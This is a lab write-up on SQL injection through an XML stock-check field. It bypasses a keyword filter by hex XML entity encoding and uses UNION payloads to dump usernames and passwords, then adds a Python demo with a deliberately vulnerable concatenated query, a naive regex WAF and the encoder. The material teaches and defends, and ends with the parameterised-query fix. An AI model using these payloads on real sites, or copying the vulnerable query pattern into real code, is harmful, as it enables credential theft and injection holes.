Lab 17 : SQL injection with filter bypass via XML encoding

Problem Statement : 

This lab contains a SQL injection vulnerability in its stock check feature. The results from the query are returned in the application’s response, so you can use a UNION attack to retrieve data from other tables.

The database contains a users table, which contains the usernames and passwords of registered users. To solve the lab, perform a SQL injection attack to retrieve the admin user’s credentials, then log in to their account.

Steps to solve this lab:

  1. First, open the lab website and launch Burp Suite.
  2. As the problem statement says, the vulnerability is in the stock check feature.

That means: click View details under any one item listed on the site.

At the bottom of the product page you will see a Check stock button.

Next we need to capture the traffic of this Check stock feature, so turn on intercept in Burp Proxy and click Check stock.

In the intercepted request (on the right-hand side) you can see that the stock check is submitted as an XML body rather than a normal form, and that it contains the tag <storeId>1</storeId>. That tag is our injection point.

Now send this request to Repeater. We have to perform a few more tests here.

Next, a simple probe: inside the storeId tag, replace the value 1 with

1+1

and you will see that the units value in the response changes (you now get the stock for store 2 instead of store 1). The database evaluated the arithmetic, which means the value is concatenated into the SQL query rather than treated as a literal number.

Next, let's try 1 UNION SELECT NULL instead of 1+1.

The response now says "Attack detected": the request has been blocked because it was flagged as a potential attack. A filter is matching the SQL keywords in the raw request, so we need to encode the UNION SELECT NULL string and try again.

Bypass the WAF

  1. As you’re injecting into XML, try obfuscating your payload using XML entities. One way to do this is using the Hackvertor extension. Just highlight your input, right-click, then select Extensions > Hackvertor > Encode > dec_entities/hex_entities.

Note: You can install Hackvertor from the BApp Store (Extensions > BApp Store in Burp).

Next, select your string, right-click and choose Extensions > Hackvertor > Send to Hackvertor.

Next, you will see that the string 1 UNION SELECT NULL has been wrapped in Hackvertor tags.

Example: <@auto_decode_no_decrypt>1 UNION SELECT NULL<@/auto_decode_no_decrypt>

Next, we need to put our string inside the <@hex_entities> tag instead. Hackvertor then rewrites every character as an XML hex character reference (for example 1 becomes &#x31;), so the raw request no longer contains the literal keywords the filter is looking for, but the application's XML parser decodes the references back to the original string before the value reaches the SQL query.

Resend the request and notice that you now receive a normal response from the application. This suggests that you have successfully bypassed the WAF.

Example :

<@hex_entities>1 UNION SELECT NULL <@/hex_entities>

Next, we can retrieve the username column from the users table the same way:

<@hex_entities>1 UNION SELECT username from users<@/hex_entities>

Next, to get the passwords as well, we have to use string concatenation: the original query returns only one column (that is why the single NULL worked), so both values have to be squeezed into that one column.

<@hex_entities>1 UNION SELECT username || '~' || password from users<@/hex_entities>

The response now lists every user as username~password. Log in as the administrator with the retrieved password. Done, flag captured.
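To tie the three steps together (the 1+1 probe, the hex-entity bypass, and the final UNION query), here is an added Python example that is not part of the original write-up and not the lab's own code. It simulates the stock check with an in-memory SQLite database and a naive signature filter; the table layout, the stock numbers and the administrator password are constructed for the demo, and only the tag names follow the request captured above. The point it shows is the ordering that makes the bypass work: the filter looks at the raw bytes, the XML parser decodes the character references afterwards, and the decoded string is what gets concatenated into the SQL.

```python
import re
import sqlite3
import xml.etree.ElementTree as ET


# Constructed stand-in for the lab's data (assumed schema; the page only
# tells us that a users table with username and password exists).
def build_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE stock (product_id INTEGER, store_id INTEGER, units INTEGER);
        INSERT INTO stock VALUES (1, 1, 24), (1, 2, 87), (1, 3, 11);
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('administrator', 'constructed-secret'),
                                 ('wiener', 'peter');
    """)
    return db


def hex_entities(payload: str) -> str:
    """Encode every character as an XML hex character reference,
    the same transformation Hackvertor's <@hex_entities> tag applies."""
    return "".join(f"&#x{ord(c):x};" for c in payload)


def stock_check_body(store_id_field: str, product_id: int = 1) -> str:
    """Build the XML body in the shape captured in Burp Proxy."""
    return ('<?xml version="1.0" encoding="UTF-8"?>'
            f'<stockCheck><productId>{product_id}</productId>'
            f'<storeId>{store_id_field}</storeId></stockCheck>')


# Naive signature filter modelling the "Attack detected" response: it inspects
# the raw request body before the XML parser has decoded anything.
WAF_PATTERN = re.compile(r"union\s+select", re.IGNORECASE)


def waf_blocks(raw_body: str) -> bool:
    return WAF_PATTERN.search(raw_body) is not None


def vulnerable_stock_check(db: sqlite3.Connection, raw_body: str):
    """Filter first, then parse the XML (character references are decoded
    here), then concatenate the storeId text straight into the query."""
    if waf_blocks(raw_body):
        return "Attack detected"
    store_id = ET.fromstring(raw_body.encode()).findtext("storeId")
    sql = f"SELECT units FROM stock WHERE product_id = 1 AND store_id = {store_id}"
    return [row[0] for row in db.execute(sql)]


def run_demo() -> dict:
    db = build_db()
    creds_payload = "1 UNION SELECT username || '~' || password FROM users"
    return {
        # 1+1 is evaluated by the database: store 2's units come back, not store 1's
        "probe_1_plus_1": vulnerable_stock_check(db, stock_check_body("1+1")),
        # the literal keywords trip the filter
        "plain_union": vulnerable_stock_check(db, stock_check_body("1 UNION SELECT NULL")),
        # hex entities carry no literal "UNION SELECT", but decode to it inside the app
        "encoded_union": vulnerable_stock_check(
            db, stock_check_body(hex_entities("1 UNION SELECT NULL"))),
        "encoded_creds": vulnerable_stock_check(
            db, stock_check_body(hex_entities(creds_payload))),
    }


if __name__ == "__main__":
    for name, result in run_demo().items():
        print(f"{name}: {result}")
```

Running it prints the store-2 stock for the 1+1 probe, "Attack detected" for the plain UNION, and the username~password rows once the same payload is sent as hex entities. The fix on the application side is not a better regex: it is parameterising the query (or at least casting storeId to an integer) after XML decoding, so that the decoded text can never become SQL.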

